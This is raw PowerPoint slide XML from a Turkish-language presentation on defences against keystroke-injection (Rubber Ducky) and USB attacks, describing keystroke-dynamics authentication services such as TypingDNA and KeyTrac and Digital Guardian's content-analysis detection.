              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>öğrenir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kullanıcı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>hakkında</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yeterli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>veri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bilindiğinde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>TypingDNA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kullanıcının</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kimliğini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>doğrulamak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>için</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>makine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>öğrenimi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yöntemlerini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kullanır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DE02DC0-3D05-45FA-957F-4B34290B408A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5998676" y="3015481"/>
            <a:ext cx="3624749"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KeyTrac</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99314759-C837-4549-B66E-CB2679A46A0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5998676" y="3836745"/>
            <a:ext cx="3624749" cy="2792034"/>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dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>TypingDNA'ya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>benzer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>şekilde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>KeyTrac</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>programcıların</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>sitelerinde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>tuş</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>vuruşu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>dinamiklerine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>dayalı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kullanıcı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kimlik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>doğrulamasını</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>uygulamalarına</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>olanak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>tanıyan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>hizmettir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>KeyTrac</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ayrıca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>diğer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>birçok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yazılım</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>dili</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>için</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> API </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>sağlar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Hizmet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ayrıca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kullanıcıların</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yalnızca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>parolaları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yerine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kısa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>paragraf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yazmalarını</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>sağlayarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kimliklerini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>doğrulayabilir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kimlik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>doğrulamanın</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>doğru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>olma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>şansını</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>artırabilir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Metin kutusu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B33D907-DFA4-4D76-B69F-04CCB7DC1D09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="673237" y="1293737"/>
            <a:ext cx="10423388" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0"/>
              <a:t>Bu savunma sistemleri özellikle tuş vuruşlarına veya USB saldırılarına karşı değil, genel olarak yetkisiz kullanıcılara karşıdır. Tuş vuruşu dinamiği çözümleri, belirli bir süre boyunca meşru kullanıcının tuş vuruşu davranışını öğrenir. Öğrenme periyodundan sonra her oturum sistem tarafından kontrol edilir ve denetlenen kullanıcının tuş vuruş davranışı meşru kullanıcıdan farklıysa oturum devre dışı bırakılır.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="129208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D27-C178-44F4-A088-509CFBA3E85A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="925469" y="139497"/>
            <a:ext cx="10353761" cy="1326321"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0"/>
              <a:t>İçerik analizi tabanlı tespit mekanizmaları</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80C2492E-74AA-48AF-A4D3-EB1191325B63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3429000" y="2601963"/>
            <a:ext cx="5346700"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Digital</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0" err="1"/>
              <a:t>Guardian</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C7332A7-4C37-4BD2-B9F9-0DE6CB00493F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3429000" y="3429000"/>
            <a:ext cx="5346699" cy="28194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200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Digital Guardian, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>olayların</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bağlamsal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kombinasyonuna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>dayalı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>olarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>tetikleme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yoluyla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> Rubber Ducky </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>tuş</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>vuruşu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>enjeksiyonunu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>algılar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>önler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>mekanizma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>iki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>modda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>çalışabilir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yalnızca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>algılama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst/>
